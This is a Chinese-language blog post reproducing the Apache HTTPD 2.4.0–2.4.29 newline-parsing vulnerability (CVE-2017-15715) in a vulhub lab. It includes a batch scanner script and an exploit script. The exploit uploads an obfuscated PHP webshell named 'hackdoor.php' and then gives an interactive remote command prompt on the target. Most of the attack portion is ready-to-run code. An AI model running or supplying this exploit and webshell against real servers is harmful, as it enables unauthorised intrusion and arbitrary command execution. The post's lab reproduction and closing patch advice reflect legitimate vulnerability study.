Apache HTTPD 换行解析(CVE-2017-15715)漏洞复现-含POC和EXP

漏洞描述


Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

影响版本 :Apache 2.4.0~2.4.29
影响说明 :绕过服务器策略,上传webshell

原因:apache这次解析漏洞的根本原因就是这个 $,正则表达式中,我们都知道$用来匹配字符串结尾位置,我们来看看菜鸟教程中对正则表达符$的解释:

匹配输入字符串的结尾位置。如果设置了 RegExp 对象的 Multiline 属性,则 $ 也匹配 '\n' 或 '\r'。要匹配 $ 字符本身,请使用 \$。

那么就明白了,在设置了 RegExp 对象的 Multiline 属性的条件下,$还会匹配到字符串结尾的换行符

环境搭建


进入漏洞目录

cd /home/vulhub/vulhub/httpd/CVE-2017-15715

开启docker环境

docker-compose up -d

测试

漏洞复现


上传文件,使用burpsuite抓包,被拦截

切换到Hex,在1.php后添加0a

插入0a

发送数据包,成功上传

进docker环境,查看文件是否存在

#查看镜像CONTAINER ID
docker ps
#进入指定CONTAINER ID的环境
docker exec -it 68f4c0a3f85c bash

测试

http://192.168.132.142:8080/1.php%0A

POC和EXP脚本


POC代码

#CVE-2017-15715-POC
__author__ = '纸机'
import requests
import optparse
import os

parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT] [-f FILE]')
parse.add_option('-u','--url',dest='URL',help='target url')
parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')
parse.add_option('-f',dest='FILE',help='target list')

options,args = parse.parse_args()
#print(options)
#验证参数是否完整
if (not options.URL or not options.PORT) and not options.FILE:
        print('Usage:python3 CVE-2017-15715-POC.py [-u url] [-p port] [-f FILE]\n')
        exit('CVE-2017-15715-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')

filename = '/2.php%0A'
headers={
  'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0',
  'Content-Type': 'multipart/form-data; boundary=---------------------------153388130435749919031880185481'
  }
#提交数据
data = '''-----------------------------153388130435749919031880185481
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: application/octet-stream

aaa
-----------------------------153388130435749919031880185481
Content-Disposition: form-data; name="name"

2.php

-----------------------------153388130435749919031880185481--'''
#验证链接
#url2 = options.URL+':'+options.PORT+filename
def upload(url):
  try:
      #上传文件
      resp = requests.post(url,headers=headers,data=data)
      return 1
  except Exception as e:
    print("[-] {0} 连接失败".format(url))
    return 0

def checking(url):
  try:
    #验证文件是否上传成功
    response = requests.get(url+filename)
    if response.status_code == 200 and 'aaa' in response.text:
        print('[+] {0} 存在CVE-2017-15715 Apache HTTPD 换行解析漏洞'.format(url))
    else:
        print('[-] {0} 不存在Apache HTTPD 换行解析漏洞'.format(url))
  except Exception as e:
    print("[-]{0}连接失败".format(url))

if options.FILE and os.path.exists(options.FILE):
  with open(options.FILE) as f:
    urls = f.readlines()
    #print(urls)
    for url in urls:
      url = str(url).replace("\n", "")
      if upload(url) == 1:
        checking(url)
elif options.FILE and not os.path.exists(options.FILE):
  print('[-] {0} 文件不存在'.format(options.FILE))
else:
  #上传链接
  url = options.URL+':'+options.PORT
  if upload(url) == 1:
    checking(url)


测试

python3 CVE-2017-15715-POC.py -u http://192.168.132.144 -p 9998

python3 CVE-2017-15715-POC.py -f IP.txt

EXP代码

#CVE-2017-15715 EXP
__author__ = 'zhiji'

import requests
import optparse
import time

parse = optparse.OptionParser(usage = 'python3 %prog -u url [-p port] version=1.0')
parse.add_option('-u','--url',dest='url',help='web server ip_addr')
parse.add_option('-p','--port',dest='port',help='web server port[default:8080]',default='8080')

options,args = parse.parse_args()
#验证参数是否完整
if not options.url or not options.port:
        print('Usage:python3 CVE-2017-15715-EXP.py -u url -p port\n')
        exit('CVE-2017-15715-EXP.py:error:missing a mandatory option(-u,-p).\nUse -h for basic and -hh for advanced help')

#ip = '192.168.132.142:8080/'
filename = '/hackdoor.php%0a?0='

#上传链接
url1 = options.url+':'+options.port
#命令执行
url2 = options.url+':'+options.port+filename

#数据包头部
headers = {
  'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0',
  'Content-Type': 'multipart/form-data; boundary=---------------------------153388130435749919031880185481'
  }
#上传数据
data = '''-----------------------------153388130435749919031880185481
Content-Disposition: form-data; name="file"; filename="hackdoor.php"
Content-Type: application/octet-stream

<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>

-----------------------------153388130435749919031880185481
Content-Disposition: form-data; name="name"

hackdoor.php

-----------------------------153388130435749919031880185481--'''

#上传木马
def upload(url):
  print('[*]目标地址:'+url1)
  respond = requests.post(url1,headers=headers,data=data)
  try:
    if respond.status_code == 200:
      print('[+]木马上传成功')
    else:
      print('[-]上传失败')
  except Exception as e:
    print(e)

#命令执行
def attack(url,cmd):
  respond = requests.get(url+cmd)
  try:
    if respond.status_code == 200 and cmd == 'pwd':
      return respond.text
    if respond.status_code == 200:
      print(respond.text)
    else:
      print('命令执行错误')
  except Exception as e:
    print(e)
upload(url1)
time.sleep(0.5)
print('输入执行命令(quit退出):')
while(1):
  pwd = attack(url2,'pwd')
  pwd = '{0}>'.format(str(pwd).replace("\n",""))
  cmd = input(pwd)
  if(cmd == 'quit'):
    break
  attack(url2,cmd)


测试

python3 CVE-2017-15715-EXP.py -u http://192.168.132.144 -p 9998

修复建议

  • 升级到最新版本

  • 对上传文件重命名

  • 禁用上传文件的执行权限

参考文章

https://blog.csdn.net/weixin_40412037/article/details/105730577

https://www.cnblogs.com/kuaile1314/p/11645692.html

posted @ 2021-10-25 20:24  纸机  阅读(950)  评论(0编辑  收藏  举报